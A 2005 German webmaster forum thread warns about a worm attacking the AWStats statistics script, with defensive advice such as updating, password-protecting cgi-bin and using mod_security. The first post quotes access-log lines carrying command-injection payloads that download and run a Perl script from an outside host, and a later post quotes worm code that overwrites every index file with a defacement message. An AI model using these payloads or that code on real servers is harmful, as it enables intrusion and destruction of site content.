Hinweis: Hackversuche für AWSTATS

Beitrag von **Pompom** » 09.03.2005, 10:52

Wir haben in den letzten Tagen vermehrt Zugriffe aus China von der IP: 61.135.136.137

Die von euch, die Awstats nutzen, sollten sich das genauer ansehen, denn plötzlich sind alle Index-Dateien wech.

Den Wurm gibt es als Quelltext derzeit unter:
https://www.krazyk9s.co.uk/spykids.txt

Logauszug:

61.135.136.137 - - [08/Mar/2005:23:24:29 +0100] "GET /awstats/awstats.pl%20target=_blan?configdir=%7Cecho%20;cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt;echo%20;echo%7C HTTP/1.0" -" "LWP::Simple/5.53"
61.135.136.137 - - [08/Mar/2005:23:24:33 +0100] "GET /awstats/awstats.pl%20target=_blan?update=1&logfile=%7Cecho%20;cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt;echo%20;echo%7C HTTP/1.0" - "LWP::Simple/5.53"
61.135.136.137 - - [08/Mar/2005:23:24:39 +0100] "GET /awstats/awstats.pl%20target=_blan?pluginmode=:system(%22cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt%22); HTTP/1.0" -" "LWP::Simple/5.53"

von **Anzeige von ABAKUS** »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002

persönliche Betreuung
individuelle Beratung
kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Beitrag von **Fruetel** » 09.03.2005, 13:01

Das musste kommen, eine Reihe von AwStats-Exploits wurde ja vor einigen Wochen veröffentlicht. Abhilfe schafft hier, neben dem obligatorischen Update, das CGI-Bin Verzeichnis per .htaccess mit einem Passwort zu schützen.

Gruss,
Thomas

Beitrag von **Luckybuy3000** » 09.03.2005, 19:41

@ pompon

Welche Version von awstats benutzt du ? Dringend empfohlen ist das update auf die Version 6.3. oder 6.4

Beitrag von **Pompom** » 09.03.2005, 22:43

Ich benutze gar keine

Aber die bösen Buben wollten auch die knacken.
Sie grasen scheinbar einfach an Hand einiger Keywords die bei google top-positionierten Seiten ab.

Beitrag von **Luckybuy3000** » 09.03.2005, 23:27

Wie geht das denn ? Hab ich da etwa was verpasst ? Mit der config dir das ist schon lange bekannt und auch wie das gefixt wird falls jemand kein update von awstats auf die aktuellste Version durchführen kann.

Ist es denn empfehlenswert, die IP vorsorglich zu sperren ? Mein AWStats ist up to date.

Beitrag von **SloMo** » 10.03.2005, 08:26

Ein Wurm pflanzt sich ja nunmal in ureigenster Bestimmung fort, kann also jederzeit von einer anderen IP kommen. Eine oder einige IPs zu sperren wird die Sicherheit nicht erhöhen.

Beitrag von **mario** » 10.03.2005, 13:58

@pompom

hatten wir auch und zwar am 2.3.05, aber index-Dateien wurden keine gelöscht "nur" extremen Traffic verursacht... Es handelt sich um genau die von Dir erwähnte IP. Unser Server wurde einfach für 30 Stunden von der Schippe geworfen. Eine Analyse ergab dann, dass der "Eindringling" über das Sicherheitsloch bei AWstats reinkam und fleissig Traffic produzierte... Ein Update auf 6.4 zeigt Wirkung, bis jetzt jedenfalls... hier eine Kurze Beschreibung:
https://blogs.ittoolbox.com/security/in ... 003227.asp

Beitrag von **Pompom** » 10.03.2005, 18:18

Mario,

dat war dann aber ein anders Script. Spätestens nach diesem Code aus dem
Quelltext

system("locate index.* >> index");
system("find / -name index.* >> index");

open(a,"<index");
@ind = <a>;
close(a);
$b = scalar(@ind);
for($a=0;$a<=$b;$a++){
chomp;
system("echo spykids ownz your server > $ind[$a]");
}

wären sonst alle index.*-Dateien mit folgendem Inhalt "spykids ownz your server" überschrieben.

Beitrag von **Pompom** » 10.03.2005, 18:19

War scheinbar mal bei Hotscripts der Fall, Siehe:
https://www.google.de/search?q=spykids+ ... rt=10&sa=N

Beitrag von **mario** » 10.03.2005, 18:31

ja es war ein anderes script und der Chinese hat's mehrfach versucht, aber nicht geschafft, aber ein Ööösi der uns bekannt ist kam dann schlussendlich rein...

Beitrag von **mauri** » 17.03.2005, 11:43

habt ihr modsecurity installiert?
https://www.modsecurity.org/

versuche das gerade...
gruss
mauri

Beitrag von **Pagemaker** » 21.12.2005, 19:09

@- Mario:

Wat is ein "AWstats"???????

Wenns Ihr schon mit den Chinesen habt, müßt Ihr deswegen nicht gleich chinesisch schwatzen.....

Gruß v. Andreas - "Pagemaker"

Beitrag von **mario** » 21.12.2005, 19:22

Pagemaker hat geschrieben:@- Mario:
Wat is ein "AWstats"???????
Wenns Ihr schon mit den Chinesen habt, müßt Ihr deswegen nicht gleich chinesisch schwatzen.....
Gruß v. Andreas - "Pagemaker"

ein Programm womit man "scharfe " Bilder produzieren kann

https://www.bflets.dyndns.org/Tools/AWStatsJpn.html

und so kannst Du das auf Deinem Server installieren

https://robert.boeck-horn.de/AWStats-In ... itung.html

liebe Grüsse aus dem Süden am kürzesten Tag des Jahres

Beitrag von **Pagemaker** » 21.12.2005, 21:08

.
@- Mario:

Lieber Mario,

"scharfe" Bilder?
Huuuch, dann können alle Leute meine Gattin nackt auf der Page sehen?
Diese Bildschirmwixxxer!

Natürlich kapierte ich, daß das "stats" wat mit Statistik zu tun hat.
Aber, so genau brauche ich es nicht und kann herzlich gern darauf verzichten.
Mir reicht es zu wissen, daß soundsoviel Idioten auf der Page waren und nur dumm dreingegafft haben.
Was anderes wäre, dieses Programm vermeldet mir, wieviel Kohle die Leute in der Tasche und auf dem Konto haben und trotzdem nix kaufen.
Aber sicher würde ich nur bestätigt bekommen, was ich eh vermute........

Gruß v. Andreas - "Pagemaker"
.